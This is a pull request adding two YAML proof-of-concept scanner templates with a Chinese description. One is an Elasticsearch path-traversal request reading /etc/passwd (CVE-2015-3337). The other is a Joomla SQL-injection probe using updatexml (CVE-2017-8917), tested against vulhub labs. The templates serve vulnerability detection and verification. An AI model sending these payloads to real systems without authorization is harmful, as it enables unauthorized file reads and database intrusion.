### PR TITLE
Create elasticsearch-cve-2015-3337.yml

### DIFF
--- a/pocs/elasticsearch-cve-2015-3337.yml
+++ b/pocs/elasticsearch-cve-2015-3337.yml
@@ -1,0 +1,11 @@
+name: elasticsearch-cve-2015-3337
+rules:
+  - method: GET
+    path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
+    expression: |
+      status==200 && body.bcontains(b'root:x:0:0')
+
+detail:
+  author: naiquan(@MSTLab)
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337

--- a/pocs/elasticsearch-cve-2015-3337.yml
+++ b/pocs/elasticsearch-cve-2015-3337.yml
@@ -1,4 +1,4 @@
-name: elasticsearch-cve-2015-3337
+name: poc-yaml-elasticsearch-cve-2015-3337
 rules:
   - method: GET
     path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd

--- a/pocs/joomla-cve-2017-8917.yml
+++ b/pocs/joomla-cve-2017-8917.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-joomla-cve-2017-8917
+rules:
+  - method: GET
+    path: >-
+      /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(564*256)),1)
+    expression: |
+      status==500 && body.bcontains(b'f3d6c65626472b77ed6d3a5af41ea01')
+
+detail:
+  author: naiquan(@MSTLab)
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917


### PR DESCRIPTION
## 本 poc 是干什么的
ElasticSearch 目录穿越漏洞（CVE-2015-3337）
在安装了具有“site”功能的插件以后，插件目录使用../即可向上跳转，导致目录穿越漏洞，可读取任意文件。没有安装任意插件的elasticsearch不受影响。

## 测试环境
https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337

## 备注

